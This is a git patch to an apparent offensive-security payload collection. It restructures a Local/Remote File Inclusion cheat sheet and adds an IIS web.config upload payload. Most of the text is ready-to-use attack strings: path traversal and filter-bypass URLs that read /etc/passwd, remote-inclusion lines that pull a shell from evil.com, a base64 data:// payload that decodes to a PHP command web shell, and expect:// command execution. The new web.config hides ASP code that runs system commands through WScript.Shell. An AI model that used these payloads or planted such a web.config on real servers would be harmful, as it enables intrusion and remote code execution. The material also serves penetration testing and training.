From 76aefd9da2c306455f207394f355c65a04f5ed87 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Sat, 7 Jul 2018 12:04:55 +0200
Subject: [PATCH] Path traversal refactor + AD cme module msf/empire + IIS
web.config
---
File Inclusion - Path Traversal/README.md | 136 +++++++++++-------
.../Active Directory Attack.md | 12 +-
SQL injection/README.md | 2 +
.../IIS Web Config/web.config | 34 +++++
4 files changed, 129 insertions(+), 55 deletions(-)
create mode 100644 Upload insecure files/IIS Web Config/web.config
diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index e0de154..087458e 100644
--- a/File Inclusion - Path Traversal/README.md
+++ b/File Inclusion - Path Traversal/README.md
@@ -1,6 +1,23 @@
# Local/Remote File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
+## Summary
+* [Basic LFI](#basic-lfi)
+* [Basic RFI](#basic-rfi)
+* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
+ * [Wrapper php://filter]()
+ * [Wrapper zip://]()
+ * [Wrapper data://]()
+ * [Wrapper expect://]()
+ * [Wrapper input://]()
+* [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
+* [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
+* [LFI to RCE via upload](#lfi-to-rce-via-upload)
+* [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
+* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
+* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
+
+
Interesting files to check out :
```
/etc/issue
@@ -20,6 +37,9 @@ Interesting files to check out :
/proc/net/route
/proc/net/tcp
/proc/net/udp
+```
+The following log files are controllable and can be included with an evil payload to achieve a command execution
+```
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
@@ -30,47 +50,68 @@ Interesting files to check out :
/var/log/mail
```
+
## Basic LFI
```
http://example.com/index.php?page=../../../etc/passwd
+```
Null byte
+```
http://example.com/index.php?page=../../../etc/passwd%00
+```
Double encoding
+```
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
+```
Path truncation
+```
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
+```
-Filter bypass
+Filter bypass tricks
+```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
+http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```
-## Basic RFI (null byte, double encoding and other tricks)
+## Basic RFI
```
http://example.com/index.php?page=http://evil.com/shell.txt
+```
+
+Null byte
+```
http://example.com/index.php?page=http://evil.com/shell.txt%00
+```
+
+Double encoding
+```
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
-## LFI / RFI Wrappers
+## LFI / RFI using wrappers
-LFI Wrapper rot13 and base64 - php://filter case insensitive
+### Wrapper php://filter
+The part "php://filter" is case insensitive
```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
+```
-can be chained with a compression wrapper
+can be chained with a compression wrapper for large files.
+```
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
```
-LFI Wrapper ZIP
+### Wrapper zip://
```python
echo "" > payload.php;
zip payload.zip payload.php;
@@ -81,50 +122,55 @@ http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
-RFI Wrapper DATA with "" payload
+### Wrapper data://
```
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
+NOTE: the payload is ""
```
+Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
-RFI Wrapper EXPECT
+
+### Wrapper expect://
```
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
```
-Bonus XSS
-XSS via RFI/LFI with "
+")
+Set wShell1 = CreateObject("WScript.Shell")
+Set cmd1 = wShell1.Exec("whoami")
+output1 = cmd1.StdOut.Readall()
+set cmd1 = nothing: Set wShell1 = nothing
+Response.write(output1)
+Response.write("
+
+–>
+
+
\ No newline at end of file